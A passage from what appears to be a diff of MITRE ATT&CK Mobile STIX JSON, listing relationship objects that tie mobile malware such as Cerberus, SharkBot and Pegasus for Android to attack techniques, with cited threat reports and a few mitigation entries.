"relationship--13078a96-2cda-4d0b-99f8-693a65a4b63d", + "created": "2020-12-18T20:14:47.297Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has generated non-human advertising impressions.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56551987-326a-46ad-a34a-59bb7ab793a9", + "created": "2020-12-14T14:52:03.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:07.828Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can request device administrator permissions.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddb5ba6d-0549-44bd-a669-972bd48e927b", + "created": "2020-07-15T20:20:59.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has used domain generation algorithms.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5706742b-733d-44e9-a032-62b81ba05bcf", + "created": "2020-06-02T14:32:31.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:52.491Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can retrieve SMS messages and iMessages.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b81ba10a-73c2-4616-a8bc-eeb422e1c5ea", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "HackerNews-Allwinner", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) reportedly contained an simple backdoor that could be used to obtain root access. It was believed to have been left in the kernel by mistake by the authors.(Citation: HackerNews-Allwinner)", + "modified": "2022-04-15T15:16:35.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc6514a0-2e9c-4f29-8c15-99e6d382e357", + "created": "2019-07-10T15:25:57.572Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:46.913Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) captures and exfiltrates SMS messages.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--79f04c05-8299-4e5e-b4c1-3f82637fa47a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bd99b570-5966-4337-8ab4-2d6f4afd0f7f", + "type": "relationship", + "created": "2019-09-04T15:38:56.799Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.138Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record video.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b5590b50-0aaa-4f43-9b29-f17ee717b551", + "type": "relationship", + "created": "2021-02-08T16:36:20.698Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.412Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included location tracking capabilities in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8606318-8c12-4381-ba33-5b2321772ea0", + "created": "2022-03-30T20:31:57.183Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised to be extra scrutinous of applications that request location or sensitive phone information permissions, and to deny any permissions requests for applications they do not recognize.", + "modified": "2022-03-30T20:31:57.183Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--df036f55-f749-4dad-9473-d69535e0f98d", + "created": "2020-06-26T14:55:13.385Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) can abuse Android’s accessibility service to record the screen PIN.(Citation: Cybereason EventBot)", + "modified": "2022-04-15T17:39:39.931Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f5e9afdc-1aeb-472f-b267-46e7978f9d78", + "created": "2023-03-20T18:54:09.674Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:09.674Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8ec03f4c-5ed8-4c25-956c-3ee6c777a5cc", + "type": "relationship", + "created": "2019-09-23T13:36:08.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-09-23T13:36:08.441Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) retrieves a list of installed applications and sends it to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8f88d438-3150-4317-b1fe-b14f13c15ac5", + "type": "relationship", + "created": "2019-09-03T19:45:48.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T16:47:53.197Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can record audio from the compromised device's microphone and can record call audio in 3GP format.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1bcd4b25-a1e0-4511-b0bf-3923a1e74c4e", + "created": "2020-12-31T18:25:05.165Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has used HTTPS for C2 communication.(Citation: CYBERWARCON CHEMISTGAMES) ", + "modified": "2022-04-18T16:00:57.320Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b2896068-4d54-41e1-b0f2-db9385615112", + "type": "relationship", + "created": "2021-01-05T20:16:20.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.426Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has shown a persistent notification to maintain access to device sensors.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3857f790-6ea1-4f37-8d90-90904f175d63", + "created": "2023-01-18T21:37:55.717Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:48:17.771Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) has C2 commands that can uninstall the app from the infected device.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--53364899-1ea5-47fa-afde-c210aed64120", + "type": "relationship", + "created": "2019-07-10T15:47:19.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-07-16T15:35:21.086Z", + "description": "(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049a5149-00c9-492a-8ffb-463f3d0cd910", + "created": "2022-03-30T20:13:28.442Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022." + }, + { + "source_name": "LauncherApps getActivityList", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent malicious applications from fully suppressing their icon in the launcher.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "modified": "2022-05-20T17:16:08.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cea30219-a255-43ae-b731-9512c5044523", + "created": "2022-04-18T19:46:02.547Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-18T19:46:02.547Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b3c2e5de-0941-4b57-ba61-af029eb5517a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f709a4a5-2d7f-4fa8-bad8-a536fd3cc7fc", + "created": "2022-04-01T13:18:40.460Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Contact list access is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their contact list. ", + "modified": "2022-04-01T13:18:40.460Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--51b0a4fb-a308-4694-9437-95702a50ebd5", + "type": "relationship", + "created": "2020-09-11T16:22:03.231Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.231Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can take photos with the device camera.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--60e2ebd0-90dc-4131-ba4f-adc9b49ec113", + "created": "2020-06-26T15:32:25.032Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can generate fake notifications and launch overlay attacks against attacker-specified applications.(Citation: Threat Fabric Cerberus)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2a1d27a5-8149-4a6c-bbb7-6db83ce3a7ce", + "type": "relationship", + "created": "2020-12-18T20:14:47.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.339Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has used timer events in React Native to initiate the foreground service.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--12098dee-27b3-4d0b-a15a-6b5955ba8879", + "type": "relationship", + "created": "2019-09-04T14:28:16.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:13.000Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) uses XOR to obfuscate its second stage binary.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--17e94f34-e367-491c-9f9f-79294e124b4f", + "created": "2020-12-17T20:15:22.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:48.246Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can intercept SMS messages.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f5fab17b-43e7-46ff-bdea-eb8c52a0c6c3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.854Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses the list of installed applications.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--de69fd86-aaef-4a1e-99e9-ee32c71997d6", + "created": "2022-04-05T19:54:12.660Z", + 